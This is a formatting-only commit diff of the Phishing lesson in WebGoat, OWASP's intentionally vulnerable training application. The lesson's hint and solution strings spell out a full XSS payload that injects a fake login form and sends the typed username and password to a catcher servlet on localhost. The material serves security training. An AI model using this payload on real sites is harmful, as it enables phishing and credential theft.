Reformat of Java source. Added JavaStyle format definitions.
git-svn-id: http://webgoat.googlecode.com/svn/trunk/webgoat@287 4033779f-a91e-0410-96ef-6bf7bf53c507
This commit is contained in:
mayhew64
@ -1,8 +1,8 @@
|
||||
|
||||
package org.owasp.webgoat.lessons;
|
||||
|
||||
import java.util.ArrayList;
|
||||
import java.util.List;
|
||||
|
||||
import org.apache.ecs.Element;
|
||||
import org.apache.ecs.ElementContainer;
|
||||
import org.apache.ecs.StringElement;
|
||||
@ -20,32 +20,31 @@ import org.owasp.webgoat.Catcher;
|
||||
import org.owasp.webgoat.session.ECSFactory;
|
||||
import org.owasp.webgoat.session.WebSession;
|
||||
|
||||
/*******************************************************************************
|
||||
|
||||
/***************************************************************************************************
|
||||
*
|
||||
*
|
||||
* This file is part of WebGoat, an Open Web Application Security Project
|
||||
* utility. For details, please see http://www.owasp.org/
|
||||
* This file is part of WebGoat, an Open Web Application Security Project utility. For details,
|
||||
* please see http://www.owasp.org/
|
||||
*
|
||||
* Copyright (c) 2002 - 2007 Bruce Mayhew
|
||||
*
|
||||
* This program is free software; you can redistribute it and/or modify it under
|
||||
* the terms of the GNU General Public License as published by the Free Software
|
||||
* Foundation; either version 2 of the License, or (at your option) any later
|
||||
* version.
|
||||
* This program is free software; you can redistribute it and/or modify it under the terms of the
|
||||
* GNU General Public License as published by the Free Software Foundation; either version 2 of the
|
||||
* License, or (at your option) any later version.
|
||||
*
|
||||
* This program is distributed in the hope that it will be useful, but WITHOUT
|
||||
* ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or FITNESS
|
||||
* FOR A PARTICULAR PURPOSE. See the GNU General Public License for more
|
||||
* details.
|
||||
* This program is distributed in the hope that it will be useful, but WITHOUT ANY WARRANTY; without
|
||||
* even the implied warranty of MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the GNU
|
||||
* General Public License for more details.
|
||||
*
|
||||
* You should have received a copy of the GNU General Public License along with
|
||||
* this program; if not, write to the Free Software Foundation, Inc., 59 Temple
|
||||
* Place - Suite 330, Boston, MA 02111-1307, USA.
|
||||
* You should have received a copy of the GNU General Public License along with this program; if
|
||||
* not, write to the Free Software Foundation, Inc., 59 Temple Place - Suite 330, Boston, MA
|
||||
* 02111-1307, USA.
|
||||
*
|
||||
* Getting Source ==============
|
||||
*
|
||||
* Source for this application is maintained at code.google.com, a repository
|
||||
* for free software projects.
|
||||
* Source for this application is maintained at code.google.com, a repository for free software
|
||||
* projects.
|
||||
*
|
||||
* For details, please see http://code.google.com/p/webgoat/
|
||||
*
|
||||
@ -70,8 +69,8 @@ public class Phishing extends LessonAdapter
|
||||
*/
|
||||
private boolean postedCredentials(WebSession s)
|
||||
{
|
||||
String postedToCookieCatcher =
|
||||
getLessonTracker(s).getLessonProperties().getProperty(Catcher.PROPERTY, Catcher.EMPTY_STRING);
|
||||
String postedToCookieCatcher = getLessonTracker(s).getLessonProperties().getProperty(Catcher.PROPERTY,
|
||||
Catcher.EMPTY_STRING);
|
||||
|
||||
// <START_OMIT_SOURCE>
|
||||
return (!postedToCookieCatcher.equals(Catcher.EMPTY_STRING));
|
||||
@ -100,8 +99,7 @@ public class Phishing extends LessonAdapter
|
||||
{
|
||||
makeSuccess(s);
|
||||
}
|
||||
}
|
||||
catch (Exception e)
|
||||
} catch (Exception e)
|
||||
{
|
||||
s.setMessage("Error generating " + this.getClass().getName());
|
||||
}
|
||||
@ -169,66 +167,65 @@ public class Phishing extends LessonAdapter
|
||||
{
|
||||
List<String> hints = new ArrayList<String>();
|
||||
hints.add("Try adding HTML to the search field to create a fake authentication form.<BR>"
|
||||
+ "Try to make the form look official.");
|
||||
+ "Try to make the form look official.");
|
||||
hints
|
||||
.add("Try: <BR> "
|
||||
+ "password<form><br><br><HR><H3>This feature requires account login:</H2"
|
||||
+ "><br><br>Enter Username:<br><input type="text" id="user" "
|
||||
+ "name="user"><br>Enter Password:<br><input type="password" "
|
||||
+ "name = "pass"><br></form><br><br><HR>");
|
||||
+ "password<form><br><br><HR><H3>This feature requires account login:</H2"
|
||||
+ "><br><br>Enter Username:<br><input type="text" id="user" "
|
||||
+ "name="user"><br>Enter Password:<br><input type="password" "
|
||||
+ "name = "pass"><br></form><br><br><HR>");
|
||||
hints
|
||||
.add("Add functionality that can post a request, a button might work<BR><BR>"
|
||||
+ "After getting the button on the page, don't forget you will need to steal the credentials and post them to: <BR>"
|
||||
+ "http://localhost./WebGoat/capture/PROPERTY=yes&ADD_CREDENTIALS_HERE");
|
||||
+ "After getting the button on the page, don't forget you will need to steal the credentials and post them to: <BR>"
|
||||
+ "http://localhost./WebGoat/capture/PROPERTY=yes&ADD_CREDENTIALS_HERE");
|
||||
hints
|
||||
.add("Try: <BR> "
|
||||
+ "<input type="submit" name="login" "
|
||||
+ "value="login">"
|
||||
+ "<BR><BR>Solution for this hint:<BR><BR>"
|
||||
+ "password<form><br><br><HR><H3>This feature requires account login:</H2"
|
||||
+ "><br><br>Enter Username:<br><input type="text" id="user" "
|
||||
+ "name="user"><br>Enter Password:<br><input type="password" "
|
||||
+ "name = "pass"><br><input type="submit" name="login" "
|
||||
+ "value="login" onclick="hack()"></form><br><br><HR>");
|
||||
+ "<input type="submit" name="login" "
|
||||
+ "value="login">"
|
||||
+ "<BR><BR>Solution for this hint:<BR><BR>"
|
||||
+ "password<form><br><br><HR><H3>This feature requires account login:</H2"
|
||||
+ "><br><br>Enter Username:<br><input type="text" id="user" "
|
||||
+ "name="user"><br>Enter Password:<br><input type="password" "
|
||||
+ "name = "pass"><br><input type="submit" name="login" "
|
||||
+ "value="login" onclick="hack()"></form><br><br><HR>");
|
||||
hints
|
||||
.add("Make the button perform an action on submit, <BR>"
|
||||
+ "adding an onclick=\"hack()\" might work<BR>"
|
||||
+ "Don't forget to add the hack() javascript function"
|
||||
+ "<BR><BR>Solution for this hint:<BR><BR>"
|
||||
+ "password<form><br><br><HR><H3>This feature requires account login:</H2"
|
||||
+ "><br><br>Enter Username:<br><input type="text" id="user" "
|
||||
+ "name="user"><br>Enter Password:<br><input type="password" "
|
||||
+ "name = "pass"><br><input type="submit" name="login" "
|
||||
+ "value="login" onclick="hack()"></form><br><br><HR>");
|
||||
+ "adding an onclick=\"hack()\" might work<BR>"
|
||||
+ "Don't forget to add the hack() javascript function"
|
||||
+ "<BR><BR>Solution for this hint:<BR><BR>"
|
||||
+ "password<form><br><br><HR><H3>This feature requires account login:</H2"
|
||||
+ "><br><br>Enter Username:<br><input type="text" id="user" "
|
||||
+ "name="user"><br>Enter Password:<br><input type="password" "
|
||||
+ "name = "pass"><br><input type="submit" name="login" "
|
||||
+ "value="login" onclick="hack()"></form><br><br><HR>");
|
||||
hints
|
||||
.add("You need to create the hack() function. This function will pull the credentials from the "
|
||||
+ "webpage and post them to the WebGoat catcher servlet. <BR>"
|
||||
+ "<BR> Some useful code snippets:<UL>"
|
||||
+ "<LI>doucument.forms[0].user.value - will access the user field"
|
||||
+ "<LI>XssImage = new Image(); XssImage.src=SOME_URL = will perform a post"
|
||||
+ "<LI>javascript string concatentation uses a \"+\" </UL>"
|
||||
+ "<BR><BR>Solution for this hint():<BR><BR>"
|
||||
+ "password<script>function hack(){ alert("Had this been a real attack... Your credentials were just stolen."
|
||||
+ "\nUser Name = " + document.forms(0).user.value + "\nPassword = " + document.forms(0).pass.value); "
|
||||
+ "XSSImage=new Image; XSSImage.src="http://localhost./WebGoat/catcher?PROPERTY=yes&user="+"
|
||||
+ "document.forms(0).user.value + "&password=" + document.forms(0).pass.value + "";}"
|
||||
+ "</script>");
|
||||
+ "webpage and post them to the WebGoat catcher servlet. <BR>"
|
||||
+ "<BR> Some useful code snippets:<UL>"
|
||||
+ "<LI>doucument.forms[0].user.value - will access the user field"
|
||||
+ "<LI>XssImage = new Image(); XssImage.src=SOME_URL = will perform a post"
|
||||
+ "<LI>javascript string concatentation uses a \"+\" </UL>"
|
||||
+ "<BR><BR>Solution for this hint():<BR><BR>"
|
||||
+ "password<script>function hack(){ alert("Had this been a real attack... Your credentials were just stolen."
|
||||
+ "\nUser Name = " + document.forms(0).user.value + "\nPassword = " + document.forms(0).pass.value); "
|
||||
+ "XSSImage=new Image; XSSImage.src="http://localhost./WebGoat/catcher?PROPERTY=yes&user="+"
|
||||
+ "document.forms(0).user.value + "&password=" + document.forms(0).pass.value + "";}"
|
||||
+ "</script>");
|
||||
hints
|
||||
.add("Complete solution for this lesson:<BR><BR>"
|
||||
+ "password<script>function hack(){ alert("Had this been a real attack... Your credentials were just stolen."
|
||||
+ "\nUser Name = " + document.forms(0).user.value + "\nPassword = " + document.forms(0).pass.value); "
|
||||
+ "XSSImage=new Image; XSSImage.src="http://localhost./WebGoat/catcher?PROPERTY=yes&user="+"
|
||||
+ "document.forms(0).user.value + "&password=" + document.forms(0).pass.value + "";}"
|
||||
+ "</script><form><br><br><HR><H3>This feature requires account login:</H2"
|
||||
+ "><br><br>Enter Username:<br><input type="text" id="user" "
|
||||
+ "name="user"><br>Enter Password:<br><input type="password" "
|
||||
+ "name = "pass"><br><input type="submit" name="login" "
|
||||
+ "value="login" onclick="hack()"></form><br><br><HR>"
|
||||
+ "<BR><BR>You may need to remove the '.' from the http://localhost./");
|
||||
+ "password<script>function hack(){ alert("Had this been a real attack... Your credentials were just stolen."
|
||||
+ "\nUser Name = " + document.forms(0).user.value + "\nPassword = " + document.forms(0).pass.value); "
|
||||
+ "XSSImage=new Image; XSSImage.src="http://localhost./WebGoat/catcher?PROPERTY=yes&user="+"
|
||||
+ "document.forms(0).user.value + "&password=" + document.forms(0).pass.value + "";}"
|
||||
+ "</script><form><br><br><HR><H3>This feature requires account login:</H2"
|
||||
+ "><br><br>Enter Username:<br><input type="text" id="user" "
|
||||
+ "name="user"><br>Enter Password:<br><input type="password" "
|
||||
+ "name = "pass"><br><input type="submit" name="login" "
|
||||
+ "value="login" onclick="hack()"></form><br><br><HR>"
|
||||
+ "<BR><BR>You may need to remove the '.' from the http://localhost./");
|
||||
/**
|
||||
* password<script>function hack(){ alert("Had this been a real
|
||||
* attack... Your credentials were just stolen.\nUser Name = " +
|
||||
* document.forms(0).user.value + "\nPassword = " +
|
||||
* password<script>function hack(){ alert("Had this been a real attack... Your credentials
|
||||
* were just stolen.\nUser Name = " + document.forms(0).user.value + "\nPassword = " +
|
||||
* document.forms(0).pass.value); XSSImage=new Image;
|
||||
* XSSImage.src="http://localhost./WebGoat/catcher?PROPERTY=yes&user="+document.forms(0).user.value +
|
||||
* "&password=" + document.forms(0).pass.value + "";}</script><form><br>
|
||||
@ -257,14 +254,13 @@ public class Phishing extends LessonAdapter
|
||||
*/
|
||||
public String getInstructions(WebSession s)
|
||||
{
|
||||
String instructions =
|
||||
"This lesson is an example of how a website might support a phishing attack<BR><BR>"
|
||||
+ "Below is an example of a standard search feature.<br>"
|
||||
+ "Using XSS and HTML insertion, your goal is to: <UL>"
|
||||
+ "<LI>Insert html to that requests credentials"
|
||||
+ "<LI>Add javascript to actually collect the credentials"
|
||||
+ "<LI>Post the credentials to http://localhost./WebGoat/catcher?PROPERTY=yes...</UL> "
|
||||
+ "To pass this lesson, the credentials must be posted to the catcher servlet.<BR>";
|
||||
String instructions = "This lesson is an example of how a website might support a phishing attack<BR><BR>"
|
||||
+ "Below is an example of a standard search feature.<br>"
|
||||
+ "Using XSS and HTML insertion, your goal is to: <UL>"
|
||||
+ "<LI>Insert html to that requests credentials"
|
||||
+ "<LI>Add javascript to actually collect the credentials"
|
||||
+ "<LI>Post the credentials to http://localhost./WebGoat/catcher?PROPERTY=yes...</UL> "
|
||||
+ "To pass this lesson, the credentials must be posted to the catcher servlet.<BR>";
|
||||
|
||||
return (instructions);
|
||||
}
|
||||
|
||||
Reference in New Issue
Block a user